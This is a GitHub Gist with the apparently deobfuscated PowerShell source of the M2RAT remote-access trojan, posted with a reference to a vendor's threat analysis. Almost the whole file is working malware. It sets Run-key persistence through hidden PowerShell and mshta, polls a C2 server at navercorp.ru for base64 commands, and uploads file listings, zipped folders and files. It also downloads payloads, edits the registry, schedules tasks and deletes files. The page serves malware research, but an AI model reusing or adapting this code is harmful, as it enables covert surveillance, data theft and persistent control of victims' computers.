Skip to content

Instantly share code, notes, and snippets.

@Sh1n0g1

Sh1n0g1/M2RAT.ps1

Last active September 25, 2023 06:03
Show Gist options

  • Select an option

    Learn more about clone URLs
  • Save Sh1n0g1/b39b0ee3e7574f817fd24a2485bf043b to your computer and use it in GitHub Desktop.

Select an option

Learn more about clone URLs
Save Sh1n0g1/b39b0ee3e7574f817fd24a2485bf043b to your computer and use it in GitHub Desktop.
Download ZIP
Raw
M2RAT.ps1
# Deobfuscated M2RAT
# Refer: https://asec.ahnlab.com/en/56857/
Start-Sleep -Seconds 68;
$buffer = 1024 * 1024;
$hostid = $env:COMPUTERNAME + '-' + $env:USERNAME;
$C2_URL = 'http://navercorp.ru/dashboard/image/202302/com.php' + '?U=' + $hostid;
$TEMPORARY_FILE = $env:TEMP + '\jXShAegMEWMw';
if (!(Test-Path$TEMPORARY_FILE)) {
New-ItemProperty -Path HKCU:\Software\ Microsoft\Windows\CurrentVersion\Run -Name fGZtM -Value 'c:\windows\system32\cmd.exe /c PowerShell.exe -WindowStyle hidden -NoLogo -NonInteractive -ep bypass ping -n 1 -w 391763 2.2.2.2 || mshta http://navercorp.ru/dashboard/image/202302/4.html' -PropertyType String -Force;
}
function Connect-C2($URL, $data) {
$bytes = [System.Text.Encoding]::UTF8.GetBytes($data);
[System.Net.HttpWebRequest] $wc = [System.Net.WebRequest]::Create($URL);
$wc.Method = 'POST';
$wc.ContentType = 'application/x-www-form-urlencoded';
$wc.ContentLength = $bytes.Length;
$request_stream = $wc.GetRequestStream();
$request_stream.Write($bytes, 0, $bytes.Length);
$request_stream.Flush();
$request_stream.Close();
[System.Net.HttpWebResponse] $res = $wc.GetResponse();
$response_stream = New-Object System.IO.StreamReader($res.GetResponseStream());
$response_string = $response_stream.ReadToEnd();
return $response_string;
}
function Send-File($URL, $filename, $attachment_name, $attachment_filename) {
$Timeout = 10000000;
$CRLF = [string] $([char] 0x0D) + [string] $([char] 0x0A);
$TwoHyphens = '--';
$Boundary = '*****';
$stream = [System.IO.File]::OpenRead($filename);
$LrB = New-Object byte[] $buffer;
while ($bytesRead = $stream.Read($LrB, 0, $buffer)) {
[System.Net.HttpWebRequest] $wc = [System.Net.WebRequest]::Create($URL);
$wc.Method = 'POST';
$wc.Timeout = $Timeout;
$wc.ContentType = 'multipart/form-data;boundary=' + $Boundary;
$request_stream = $wc.GetRequestStream();
$heading1 = [System.Text.Encoding]::UTF8.GetBytes($TwoHyphens + $Boundary + $CRLF);
$request_stream.Write($heading1, 0, $heading1.Length);
$heading2 = [System.Text.Encoding]::UTF8.GetBytes('Content-Disposition: form-data; name=' + [string] $([char] 0x22) + $attachment_name + [string] $([char] 0x22) + ';filename=' + [string] $([char] 0x22) + $attachment_filename + [string] $([char] 0x22) + $CRLF);
$request_stream.Write($heading2, 0, $heading2.Length);
$heading3 = [System.Text.Encoding]::UTF8.GetBytes($CRLF);
$request_stream.Write($heading3, 0, $heading3.Length);
$request_stream.Write($LrB, 0, $bytesRead);
$request_stream.Write($heading3, 0, $heading3.Length);
$heading4 = [System.Text.Encoding]::UTF8.GetBytes($TwoHyphens + $Boundary + $TwoHyphens + $CRLF);
$request_stream.Write($heading4, 0, $heading4.Length);
$request_stream.Flush();
$request_stream.Close();
[System.Net.HttpWebResponse] $res = $wc.GetResponse();
$response_stream = New-Object System.IO.StreamReader($res.GetResponseStream());
$response_string = $response_stream.ReadToEnd();
}
$stream.Close();
}
function Download-File($URL, $filename) {
[System.Net.HttpWebRequest] $Request = [System.Net.WebRequest]::Create($URL);
$Request.set_Timeout(15000);
$Response = $Request.GetResponse();
$ResponseStream = $Response.GetResponseStream();
$SplitSize = 1024;
$Buffer = New-Object -TypeName Byte[] -ArgumentList $SplitSize;
Try {
Do {
$Count = $ResponseStream.Read($Buffer, 0, $SplitSize);
$offset = $Count -1;
Add-Content $filename $Buffer[0..$offset] -Encoding Byte;
}
Until($Count -eq 0)
}
Catch {}
Finally {
$ResponseStream.Dispose();
}
}
do {
Try {
$c2_command = Connect-C2 $C2_URL '';
If($c2_command -ne 'null' -and $c2_command -ne '') {
$c2_command = $c2_command.SubString(1, $c2_command.Length -2);
$c2_command_plain = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($c2_command));
if ($c2_command_plain) {
if ($c2_command_plain.Contains('fileinfo:')) {
$arg = $c2_command_plain.SubString(9);
if (Test-Path-Path $arg) {
$filename = $TEMPORARY_FILE + '.csv';
Get-ChildItem $arg -Filter * .*-Recurse | Select-Object Name, Length, LastWriteTime, Fullname | Export-Csv -Path $filename -Force -NoTypeInformation -Encoding utf8;
$attachment_name = '_file';
$nowtime = Get-Date -Format yyyy -MM -dd_HH_mm_ss;
$attachment_filename = $nowtime + '_fileinfo';
Send-File $C2_URL $filename $attachment_name $attachment_filename;
Remove-Item -Path $filename;
}
}
if ($c2_command_plain.Contains('dir:')) {
$arg = $c2_command_plain.SubString(4);
if (Test-Path-Path $arg) {
$filename = $TEMPORARY_FILE + '.zip';
Compress-Archive $arg $filename -Force;
$attachment_name = '_file';
$nowtime = Get-Date -Format yyyy -MM -dd_HH_mm_ss;
$attachment_filename = $nowtime + '_dir';
Send-File $C2_URL $filename $attachment_name $attachment_filename;
Remove-Item -Path $filename;
}
}
if ($c2_command_plain.Contains('file:')) {
$arg = $c2_command_plain.SubString(5);
if (Test-Path-Path $arg) {
$attachment_name = '_file';
$nowtime = Get-Date -Format yyyy -MM -dd_HH_mm_ss;
$attachment_filename = $nowtime + '_file';
Send-File $C2_URL $arg $attachment_name $attachment_filename;
}
}
if ($c2_command_plain.Contains('down:')) {
$arg = $c2_command_plain.SubString(5);
$CharArray = $arg.Split('||');
if ($CharArray.Length -eq 3) {
Download-File $CharArray[0] $CharArray[2];
$status = 'R=' + [System.Convert]::ToBase64String([System.Text.Encoding]::UTF8.GetBytes('ok'));
Connect-C2 $C2_URL $status;
}
}
if ($c2_command_plain.Contains('regedit:')) {
$arg = $c2_command_plain.SubString(8);
$CharArray = $arg.Split('||');
if ($CharArray.Length -eq 5) {
New-ItemProperty -Path $CharArray[0] -Name $CharArray[2] -Value $CharArray[4] -PropertyType String -Force;
$status = 'R=' + [System.Convert]::ToBase64String([System.Text.Encoding]::UTF8.GetBytes('ok'));
Connect-C2 $C2_URL $status;
}
}
if ($c2_command_plain.Contains('task:')) {
$arg = $c2_command_plain.SubString(5);
$CharArray = $arg.Split('||');
if ($CharArray.Length -eq 5) {
$Action = New-ScheduledTaskAction -Execute $CharArray[4];
$Settings = New-ScheduledTaskSettingsSet;
$trigger = New-ScheduledTaskTrigger -Once -At(Get-Date) -RepetitionInterval(New -TimeSpan -Minutes 10);
$Task = New-ScheduledTask -Action $Action -Trigger $Trigger -Settings $Settings;
Register-ScheduledTask -TaskName $CharArray[2] -TaskPath $CharArray[0] -InputObject $Task;
$status = 'R=' + [System.Convert]::ToBase64String([System.Text.Encoding]::UTF8.GetBytes('ok'));
Connect-C2 $C2_URL $status;
}
}
if ($c2_command_plain.Contains('zip:')) {
$arg = $c2_command_plain.SubString(4);
$CharArray = $arg.Split('||');
if ($CharArray.Length -eq 3) {
Expand -Archive $CharArray[0] $CharArray[2];
$status = 'R=' + [System.Convert]::ToBase64String([System.Text.Encoding]::UTF8.GetBytes('ok'));
Connect-C2 $C2_URL $status;
}
}
if ($c2_command_plain.Contains('rename:')) {
$arg = $c2_command_plain.SubString(7);
$CharArray = $arg.Split('||');
if ($CharArray.Length -eq 3) {
Rename-Item $CharArray[0] $CharArray[2];
$status = 'R=' + [System.Convert]::ToBase64String([System.Text.Encoding]::UTF8.GetBytes('ok'));
Connect-C2 $C2_URL $status;
}
}
if ($c2_command_plain.Contains('del:')) {
$arg = $c2_command_plain.SubString(4);
if (Test-Path-Path $arg) {
Remove-Item $arg;
$status = 'R=' + [System.Convert]::ToBase64String([System.Text.Encoding]::UTF8.GetBytes('ok'));
Connect-C2 $C2_URL $status;
}
}
}
}
}
Catch {}
Start-Sleep -Seconds 5;
} while ($true -eq $true)
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment